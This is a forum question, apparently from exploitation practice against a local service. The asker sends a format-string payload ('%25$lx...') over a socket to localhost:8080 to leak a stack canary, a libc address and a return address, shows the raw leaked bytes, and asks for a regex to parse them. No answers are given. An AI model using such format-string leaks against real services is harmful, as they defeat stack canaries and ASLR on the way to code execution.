i want a regex function for parsing shellcode to get hex address in python

126 Views Asked by At
b'%25$lx\n%37$lx\n%27$lx\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x84\x81\xac\x98U\x00\x00\x00\xab\xa5\x7f\xd6v\x15\x1d0`\x9b\xf9\xfe\x7f\x00\x00S\x84\x81\xac\x98U\x00\x00(a\x9b\xf9\xfe\x7f\x00\x00\xb5\x84\x81\xac\x01\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x02\x00\xe8\x84\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00 a\x9b\xf9\xfe\x7f\x00\x00\x00\xab\xa5\x7f\xd6v\x15\x1d\x00\x00\x00\x00\x00\x00\x00\x00\xed\xf7(\xa2n\x7f\x00\x00(a\x9b\xf9\xfe\x7f\x00\x00\x00P\x9e\xf9\x01\x00\x00\x00\xf8\x82\x81\xac\x98U\x00\x00Yd\x9b\xf9\xfe\x7f\x00\x00p\x84\x81\xac\x98U\x00\x00\xe0\xe1\xc5\xd6J\xda\x0f\xc6\x10\x81\x81\xac\x98U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xe1E\x16|)\xf29\xe0\xe1\x899\x1b\x9e\xd28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(a\x9b\xf9\xfe\x7f\x00\x008a\x9b\xf9\xfe\x7f\x00\x00 \x82G\xa2n\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

so i want to retrieve these values ( stack canary, system call, return address of a function)

1d1576d67fa5ab00
7f6ea228f7ed
5598ac818453 

from the client socket

this is my python code on the client side

import socket
import re
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 8080))
s.sendall('%25$lx\n%37$lx\n%27$lx'.encode())
while 1:
    data = s.recv(400)
    print(data)
    if not data:
        break
    results = [
    dict(re.findall(r'\s--([0-9a-fA-F]+)(?:--)?\s', data))
    for data in filter(
        bool,  # non-empty
        data.decode("utf8", "replace").split("&&"),
    )
]
print (results)
s.close()

so i want to retrieve these values ( stack canary, system call, return address of a function).

0

There are 0 best solutions below